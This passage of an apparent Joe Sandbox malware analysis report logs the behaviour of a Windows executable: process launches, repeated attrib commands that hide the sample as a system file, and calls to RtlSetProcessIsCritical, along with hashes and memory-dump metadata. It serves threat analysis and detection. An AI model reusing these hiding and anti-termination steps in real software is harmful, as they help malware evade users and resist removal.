                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:36
                                        Start time:04:22:20
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:37
                                        Start time:04:22:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:38
                                        Start time:04:22:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:39
                                        Start time:04:22:32
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:40
                                        Start time:04:22:32
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:41
                                        Start time:04:22:37
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:42
                                        Start time:04:22:38
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:43
                                        Start time:04:22:39
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:44
                                        Start time:04:22:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:13.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0
                                          execution_graph 22569 4f422a4 22570 4f4229e 22569->22570 22570->22569 22571 4f4223f 22570->22571 22574 7dcf540 22570->22574 22578 7dcf530 22570->22578 22575 7dcf55c 22574->22575 22582 7dc8e8c 22575->22582 22579 7dcf540 22578->22579 22580 7dc8e8c RtlSetProcessIsCritical 22579->22580 22581 7dcf5ae 22580->22581 22581->22571 22583 7dcf610 RtlSetProcessIsCritical 22582->22583 22585 7dcf5ae 22583->22585 22585->22571

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /pq$"Jp$"Jp$"Jp$"Jp$"Jp$(Bp$^Jp$$jq
                                          • API String ID: 0-1161702195
                                          • Opcode ID: ec7c79106c14dbc5fec39d0ba286c7d2d682ac3880b55ba2689fde5c9f928ee0
                                          • Instruction ID: 888a63722aac524257106934570104bc2e244d48713d55afe94bfef7f6114a2c
                                          • Opcode Fuzzy Hash: ec7c79106c14dbc5fec39d0ba286c7d2d682ac3880b55ba2689fde5c9f928ee0
                                          • Instruction Fuzzy Hash: F81249B4B00206CFCB14DB69D994A6EBBF7EF88310B14856DD40ADB3A5DA34EC45CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $jq
                                          • API String ID: 0-2886413773
                                          • Opcode ID: ec1e5c2d001bcce8f590039cd1eb1b4e68587887d90afbc6c91bc1658810fbe8
                                          • Instruction ID: b2082996c9b8cb6c0d9af4eca63509fe8485f13f69442f74102ac89b0d9a70ac
                                          • Opcode Fuzzy Hash: ec1e5c2d001bcce8f590039cd1eb1b4e68587887d90afbc6c91bc1658810fbe8
                                          • Instruction Fuzzy Hash: 6E124A34B002159FCB14DF69C9549AEBBB6FF88310B158169E906EB365DF34EC02CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \V=m
                                          • API String ID: 0-2437245023
                                          • Opcode ID: c4a27d890b714a56b7e6ca21b4809e57fdb686e20b65080df850d6a967b0a004
                                          • Instruction ID: c2b3745755a9f2f956521f084e4382abb261a2895e9f890e3a9dacb2b81f73cc
                                          • Opcode Fuzzy Hash: c4a27d890b714a56b7e6ca21b4809e57fdb686e20b65080df850d6a967b0a004
                                          • Instruction Fuzzy Hash: F4E1E4B4E00219CFEB60DFA9CD81B9DFBB2BF49304F1481AAD409A7250DB749A85CF55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: ea35a44a2c7edadbd8b63992240f399b5137c8464f0dd295a07c000536773b54
                                          • Instruction ID: 75dc62fc98d5e3370f36cdf99b6b5e04f1d3ed3977000f406a6aceb9f1eb9e44
                                          • Opcode Fuzzy Hash: ea35a44a2c7edadbd8b63992240f399b5137c8464f0dd295a07c000536773b54
                                          • Instruction Fuzzy Hash: F581E674E00248CFDB45DFA9C89499DBBB2BF4A310F2590AAE805AB365DB31AC05CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4f4ad68-4f4adaa 4 4f4adb4-4f4e277 0->4 696 4f4e2c1-4f4e2c8 4->696 697 4f4e279-4f4e290 696->697 698 4f4e2ca-4f4e2cf 696->698 699 4f4e2d0-4f4e30a 697->699 700 4f4e292-4f4e2be 697->700 700->696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: 0cf7cdefe74b34beff66b5689b5be89f74108340fd662c060dbd30816b301c44
                                          • Instruction ID: 5213213ffaa4cffdaac09fc701eb45ac2cdef1c4fb61dfdafbaeae010ae7195c
                                          • Opcode Fuzzy Hash: 0cf7cdefe74b34beff66b5689b5be89f74108340fd662c060dbd30816b301c44
                                          • Instruction Fuzzy Hash: 73532E70B80318AFEB169B64DC11B9DBB7BEF49300F1040D9EA096B2A4CB756E84DF15

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 705 4f4ad43-4f4ad9a 710 4f4ada5-4f4adaa 705->710 711 4f4adb4-4f4e277 710->711 1403 4f4e2c1-4f4e2c8 711->1403 1404 4f4e279-4f4e290 1403->1404 1405 4f4e2ca-4f4e2cf 1403->1405 1406 4f4e2d0-4f4e30a 1404->1406 1407 4f4e292-4f4e2be 1404->1407 1407->1403
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: c6b4e0f456108ead5d9154e88b0b6251e236b92d3efa281c9c17e4cf6a8a0d20
                                          • Instruction ID: 72bb92673c7bdc59caf42970d1049133a5bbd893ef250ae675d0b0b490fb28f0
                                          • Opcode Fuzzy Hash: c6b4e0f456108ead5d9154e88b0b6251e236b92d3efa281c9c17e4cf6a8a0d20
                                          • Instruction Fuzzy Hash: 72532E70B80318AFEB169B64DD11B9DBA7BEF49300F1040D9EA096B2E4CB756E84DF15

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1412 4f4ad3f-4f4ad9b 1414 4f4ada5-4f4adaa 1412->1414 1415 4f4adb4-4f4e277 1414->1415 2107 4f4e2c1-4f4e2c8 1415->2107 2108 4f4e279-4f4e290 2107->2108 2109 4f4e2ca-4f4e2cf 2107->2109 2110 4f4e2d0-4f4e30a 2108->2110 2111 4f4e292-4f4e2be 2108->2111 2111->2107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: f91881b208db8f451de225e5e2b72a53b84089987796969109aa2a813f77c39d
                                          • Instruction ID: 8d00714a477ee83742c8722baffa61f3b4ee04abbc4c0958e68b63457ff053df
                                          • Opcode Fuzzy Hash: f91881b208db8f451de225e5e2b72a53b84089987796969109aa2a813f77c39d
                                          • Instruction Fuzzy Hash: 4B532F70B80318AFEB269B64DD11B9DBA7BEF49300F1040D5EA096B2E4CB756E84DF15

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2547 7c32fd8-7c332a0 2549 7c332a2 2547->2549 2550 7c332a7-7c333f1 2547->2550 2549->2550 2566 7c333f7-7c33479 call 7c32694 2550->2566 2574 7c33485 2566->2574 2575 7c3347b-7c33484 2566->2575 2576 7c33486 2574->2576 2575->2574 2576->2576
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 01e27e7ab4fd3254672e9e53c1f47c95bd5219284fe6ffee6bfdabdc4b756a7d
                                          • Instruction ID: 3e27bb24042eccdef1085bb83306dc4a4a5ff44cc1725352e0b24f9ebd7dfbb1
                                          • Opcode Fuzzy Hash: 01e27e7ab4fd3254672e9e53c1f47c95bd5219284fe6ffee6bfdabdc4b756a7d
                                          • Instruction Fuzzy Hash: 2881A074E10218DFDB04DFA9D994A9DBBB2FF89310F209169E809AB365DB30AC41CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2728 7dc8e8c-7dcf6d7 RtlSetProcessIsCritical 2731 7dcf6de-7dcf717 2728->2731 2732 7dcf6d9 2728->2732 2732->2731
                                          APIs
                                          • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 07DCF6C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID: CriticalProcess
                                          • String ID:
                                          • API String ID: 2695349919-0
                                          • Opcode ID: 9bec5c44fb484015955247a50447dcefb184b03ff4f64c7c9f2571d23c015cbd
                                          • Instruction ID: 61eb1c47b6843de4247e7c35eac8d29b64e5f4aa75fe24ad7addb16cc50007d3
                                          • Opcode Fuzzy Hash: 9bec5c44fb484015955247a50447dcefb184b03ff4f64c7c9f2571d23c015cbd
                                          • Instruction Fuzzy Hash: 5A31F0B5D04259DFDB10CFAAD484AEEFBF5AF09310F14906AE854B3250C738AA45CFA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2735 7dcf609-7dcf650 2736 7dcf658-7dcf6d7 RtlSetProcessIsCritical 2735->2736 2737 7dcf6de-7dcf717 2736->2737 2738 7dcf6d9 2736->2738 2738->2737
                                          APIs
                                          • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 07DCF6C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID: CriticalProcess
                                          • String ID:
                                          • API String ID: 2695349919-0
                                          • Opcode ID: ef201842e9f12dd22272671256fb4a75a865281de8243851c9316f3364fed65b
                                          • Instruction ID: 02c117cab30bb5fe92de6823f07f8216c510595216052e9d79e1abe33a35a90c
                                          • Opcode Fuzzy Hash: ef201842e9f12dd22272671256fb4a75a865281de8243851c9316f3364fed65b
                                          • Instruction Fuzzy Hash: 5231DDB5D04259DFDB10CFAAD484AEEFBF5AF09310F14906AE854B3250C738AA45CFA4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,nq
                                          • API String ID: 0-1069744364
                                          • Opcode ID: 45ebb9e5e44a1292d111a58c3380177a37120bfd49d77e4b83993434fc30aeae
                                          • Instruction ID: cee79806cb168624721265311e47f1d3f6cea58cfce1758989119d1e68c481ce
                                          • Opcode Fuzzy Hash: 45ebb9e5e44a1292d111a58c3380177a37120bfd49d77e4b83993434fc30aeae
                                          • Instruction Fuzzy Hash: 8781B7F4B442169FCB249F398954D2B7FEAAFC5250B154496C502CB3A4EEA4ED03C772
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 920a8a823867132fa68d154a79856baaa0c29b6becb2ec741e802c5ac1343dbb
                                          • Instruction ID: 190acd857f3bca0c48849e99e84ac12809bfd87d2b3045581f47d47405889d3c
                                          • Opcode Fuzzy Hash: 920a8a823867132fa68d154a79856baaa0c29b6becb2ec741e802c5ac1343dbb
                                          • Instruction Fuzzy Hash: AE719F74E10218DFDB04DFA9D994A9DBBF2BF89300F209169E809AB365DB31AC41CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 838d63e5bd666740f254a1fef5d525ff8173e7ab02a986047d73a8c98ac76e70
                                          • Instruction ID: 39075854ab04bc03649e0a8d963257fc2b835e7c97a0d40c428e8145a46da181
                                          • Opcode Fuzzy Hash: 838d63e5bd666740f254a1fef5d525ff8173e7ab02a986047d73a8c98ac76e70
                                          • Instruction Fuzzy Hash: E0617970A006069FCB15DF69D4C0CABFBB6FF88310B10C56AD91997665DB34F952CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 90d33bd60023193cc80418b7f28417431c2b184b89f116d031cfb882e7ec20d8
                                          • Instruction ID: 8ab56cc0fb3fc9f8bd4fa78986bd72343d19a135312bfc10886622927569e373
                                          • Opcode Fuzzy Hash: 90d33bd60023193cc80418b7f28417431c2b184b89f116d031cfb882e7ec20d8
                                          • Instruction Fuzzy Hash: 65718C74E10218CFDB48DFA9C99499DBBF2BF89311F249169E809AB365DB31A801CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: }
                                          • API String ID: 0-4239843852
                                          • Opcode ID: 390fdb75eceeaf7e7715fa2164ca62c6842cd31e7c524fab6a999ff4a0d1265c
                                          • Instruction ID: ea81cd320849902b71c681977bc7ccb859c8c8a79bf7ce513aca1778499ff837
                                          • Opcode Fuzzy Hash: 390fdb75eceeaf7e7715fa2164ca62c6842cd31e7c524fab6a999ff4a0d1265c
                                          • Instruction Fuzzy Hash: C9511471204340AFD316EB38E454A6ABBB6EF89354F048569D1468B796DF38FC0BC740
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: 08e11062ecf684eed636549b4e44b5527fc03f91c5ab5b02962b24bd17696c24
                                          • Instruction ID: e9f85555c58f50430aa680d8d54294804795bc0809fc6d7e376c67ea1bd982c8
                                          • Opcode Fuzzy Hash: 08e11062ecf684eed636549b4e44b5527fc03f91c5ab5b02962b24bd17696c24
                                          • Instruction Fuzzy Hash: 44F0A4313445004FC259EB28F55096EBFE7EFC5241314497AD44ACB7A5DE28BD4BC7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: 4b8c54707127df6470285857b26156f2c5f02d452ef0f8209d8f6917a53c5c8d
                                          • Instruction ID: e04cef53a8c339334213be301bd6ecf06d0902357dfac6c3b5b4d5a06529821a
                                          • Opcode Fuzzy Hash: 4b8c54707127df6470285857b26156f2c5f02d452ef0f8209d8f6917a53c5c8d
                                          • Instruction Fuzzy Hash: E4D0A7315456630EF60E661979205AA295DEF452407010575D802C6157CF18DD0A8BA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25c83e7d3c83e93997ddbb01fb77f1ced24540707a8c26e1df9c7959833a9077
                                          • Instruction ID: b090c2edd567b9774fb9af7cc8193c89fd02b3710b62dc7fb213a46a37824a9b
                                          • Opcode Fuzzy Hash: 25c83e7d3c83e93997ddbb01fb77f1ced24540707a8c26e1df9c7959833a9077
                                          • Instruction Fuzzy Hash: 454191B02407406FD359EF24E950B4ABBE6EF81350F40D96CC1468BA65DB75F90DCB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9be21f79e0bcfef3d55652db9e526828a1928336718eb7ffae7632d1a418baea
                                          • Instruction ID: ac1de778d7bd8b7c6f18f186aeb442c3eaf781d4bed81c14222685b214171565
                                          • Opcode Fuzzy Hash: 9be21f79e0bcfef3d55652db9e526828a1928336718eb7ffae7632d1a418baea
                                          • Instruction Fuzzy Hash: 3B415E71240700AFD315EB38E555A6EB7ABEF88254F008A28D5478B758DF79FD0ACB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17d1824725628f0e3811024cce65792da9a102eecdf3ab3d5156e5b6e13f4e40
                                          • Instruction ID: 06360abc3078e9123c0dc8fad1d4432623831798bd05504c18e7355e1109a534
                                          • Opcode Fuzzy Hash: 17d1824725628f0e3811024cce65792da9a102eecdf3ab3d5156e5b6e13f4e40
                                          • Instruction Fuzzy Hash: 6F411EB4D0161DCFCB18DFAAD884AEDBBB2BF8A304F188029D405BB264DB315942CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45e70b4880a410531b3cfeef0b833a9a75aa2c1bfaf415466ae25e44a0501db4
                                          • Instruction ID: 1fb5d0fa10c7b2e8904b365fdd7a23233d3b48d0fed04368a89746bf069b8749
                                          • Opcode Fuzzy Hash: 45e70b4880a410531b3cfeef0b833a9a75aa2c1bfaf415466ae25e44a0501db4
                                          • Instruction Fuzzy Hash: F341D474E01218DFDB19DFA9D890AEEBBB6FF89300F10842AE80577394CB356846CB54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b06181264e62200b8ce7caf75f67b20cb87fabefcbb68c4058351b13981967fe
                                          • Instruction ID: c04f52e1055e62d5a7ff18b148b1969cd13794f591b107d7bc096683d8c1242e
                                          • Opcode Fuzzy Hash: b06181264e62200b8ce7caf75f67b20cb87fabefcbb68c4058351b13981967fe
                                          • Instruction Fuzzy Hash: 8441C2B0D02208CFDB19DFB4D890AADBBB2BF4A305F609469D411772A0DB759886CF64
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 397fa15c8f1768825d44b4dca173b2fc1247e3c67ef4c772682b38c71fbf860e
                                          • Instruction ID: d22fc98611c6be76d087492037cc13495a8508df706648a4a417168f97480203
                                          • Opcode Fuzzy Hash: 397fa15c8f1768825d44b4dca173b2fc1247e3c67ef4c772682b38c71fbf860e
                                          • Instruction Fuzzy Hash: BF410674E01208DFDB59DFB4E890A9DBBB2FF8A305F10546AE405B7364CB35A882CB54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3ce957fa6d6cb729e536bfc50bcf480aa9852c3cedb774d27c7c88f3d88aa1d
                                          • Instruction ID: 937a5d07b6857e0dc1b793a67331ecbc6b6a2976b29c644bc6e1e2beff22cd18
                                          • Opcode Fuzzy Hash: a3ce957fa6d6cb729e536bfc50bcf480aa9852c3cedb774d27c7c88f3d88aa1d
                                          • Instruction Fuzzy Hash: C24162B0240B006FD359EF25E950B4ABBEAEF81354F40D92CC1468BA65DB75F90CCB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df9bb60eef3da82121bb1c06f05dbe8e3fa53359d9bbd12f7aa07e3b4ebb3760
                                          • Instruction ID: bb3e466e4b2604ed9e9ca2222c6253a3d47da8caa6e79cdac3896a180bb7e582
                                          • Opcode Fuzzy Hash: df9bb60eef3da82121bb1c06f05dbe8e3fa53359d9bbd12f7aa07e3b4ebb3760
                                          • Instruction Fuzzy Hash: 5B41C4B5E012089FCB08DFAAD5809DEFBF6FF89310F14912AE805AB354DB31A945CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
